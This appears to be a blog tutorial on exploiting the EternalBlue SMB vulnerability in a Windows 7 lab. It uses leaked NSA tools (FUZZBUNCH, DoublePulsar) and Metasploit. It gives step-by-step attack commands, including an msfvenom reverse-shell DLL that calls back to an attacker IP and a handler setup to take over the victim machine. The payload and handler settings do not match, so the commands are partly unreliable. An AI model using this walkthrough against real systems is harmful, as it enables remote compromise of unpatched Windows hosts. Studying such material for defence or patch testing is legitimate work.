i Exploit Eternalblue vulnerability using NSA leaked tools and metasploit – All things in moderation

Exploit Eternalblue vulnerability using NSA leaked tools and metasploit

Introduction

EternalBlue (CVE-2017-0144) is an exploit a vulnerability in Microsoft’s Server Message Block (SMB) protocol, it’s believed to have been developed by the U.S. National Security Agency (NSA). It was leaked by the Shadow Brokers hacker group on April 2017, and was used as part of the worldwide WannaCry ransomware attack on May 2017.

Exploit Eternalblue vulnerability using NSA’s leaked tools (FUZZBUNCH) and Metasploit framework

April 8 2017, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.

FUZZBUNCH is a NSA’s exploit framework like Metasploit.

In this tutorial we will use FUZZBUNCH to checking for vulnerable to eternalblue, inject and execute payload into victim, then use Metasploit’s Meterpreter to compromise victim machine.

1. Setting up FUZZBUNCH

Requirements:

  • Python 2.6: https://www.python.org/download/releases/2.6/
  • PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
  • Target machine: Windows 7
  • Attacker machine 1: Windows 7 with FUZZBUNCH
  • Attacker machine 2: Kali linux with metasploit framework

Dowload NSA’tool, move to the folder shadowbrokermaster/Windows), then open and configuration the “ResourcesDir” and “LogDir” in the Fuzzbunch.xml file like following:

Comment the fllowing command in fb.py (line number 72), because inside the leak have no module named is “ListeningPost”. If we use this command, an error will happening when execute fb.py file.

# addplugins(fb, "ListeningPost", LP_DIR,      EDFPlugin)

2. Checking for vulnerable to Eternalblue

Execute the fb.py file by enter command “python fb.py”

Enter target Ip and callback ip address(attacker ip address)

We’ll use by default configurations in every parameter:

Except at the following, we need to change mode to “1”:

Finally, if target vulnerable to eternalblue we should see the message “Eternalblue Succeeded”

3. Generate payload with msfvenom

Generate payload by enter following command in kali terminal:

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.28.140 -b "\x00" LPORT=4444  -f dll -o /root/eternalblue/backdoor.dll

4. Start metasploit exploit/multi/handler

In attacker machine type following command to use metasploit to handl the payload we have send before.

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost 192.168.28.140

set lport 4444

run


5. Send and execute payload on target using DoublePulsar in NSA leaked tools

The next step is to run DoublePulsar and inject the malicious backdoor.dll file. Enter the command “use DoublePulsar” in FUZZBUNCH to use DoublePulsar:

Configuration the targets ip address, port, protocol, OS architecture, path to dll backdoor file …

If successful to send the payload to victim ,output should like as following:

5. Compromised target using Meterpreter shell in Metasploit

Backdoor already running on target, when we switch back to Metasploit again we should have received a Meterpreter shell:

References

https://www.exploit-db.com/docs/41896.pdf
https://cysinfo.com/wp-content/uploads/2017/04/Shadow_release_updated.pdf
https://community.rapid7.com/community/metasploit/blog/2017/05/17/metasploit-the-power-of-the-community-and-eternalblue
https://en.wikipedia.org/wiki/EternalBlue

Leave a Reply